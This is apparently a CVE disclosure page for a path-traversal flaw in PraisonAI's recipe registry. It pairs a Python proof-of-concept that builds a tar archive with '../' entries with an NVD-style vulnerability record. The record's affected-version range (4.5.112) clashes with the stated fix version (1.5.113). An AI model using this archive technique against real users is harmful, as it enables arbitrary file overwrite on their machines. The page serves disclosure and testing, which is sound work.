CVE-2026-39306

# Proof of Concept for CVE-2026-39306 # This script demonstrates how a malicious tar archive can be created # to exploit the path traversal vulnerability in PraisonAI < 1.5.113. import tarfile import os def create_malicious_tar(): # Create a file to be included in the archive payload_content = b"Malicious payload content" with open("evil.txt", "wb") as f: f.write(payload_content) # Create a tar archive with tarfile.open("malicious_recipe.praison", "w") as tar: # Add a file with a path traversal sequence (../) # This will attempt to write to the parent directory upon extraction tar.add("evil.txt", arcname="../../../tmp/evil_payload.txt") print("[+] Malicious tar archive created: malicious_recipe.praison") print("[+] Use this file in the recipe registry to test the vulnerability.") # Note: The vulnerable code in PraisonAI would look something like: # tar = tarfile.open(file_path) # tar.extractall(output_dir) # Vulnerable call without path validation # tar.close() if __name__ == "__main__": create_malicious_tar()

{"cve": {"id": "CVE-2026-39306", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:36.470", "lastModified": "2026-04-16T01:23:37.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry pull flow extracts attacker-controlled .praison tar archives with tar.extractall() and does not validate archive member paths before extraction. A malicious publisher can upload a recipe bundle that contains ../ traversal entries and any user who later pulls that recipe will write files outside the output directory they selected. This is a path traversal / arbitrary file write vulnerability on the client side of the recipe registry workflow. It affects both the local registry pull path and the HTTP registry pull path. The checksum verification does not prevent exploitation because the malicious traversal payload is part of the signed bundle itself. This vulnerability is fixed in 1.5.113."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.112", "matchCriteriaId": "93136744-3972-4DDD-B569-091065F57C0B"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}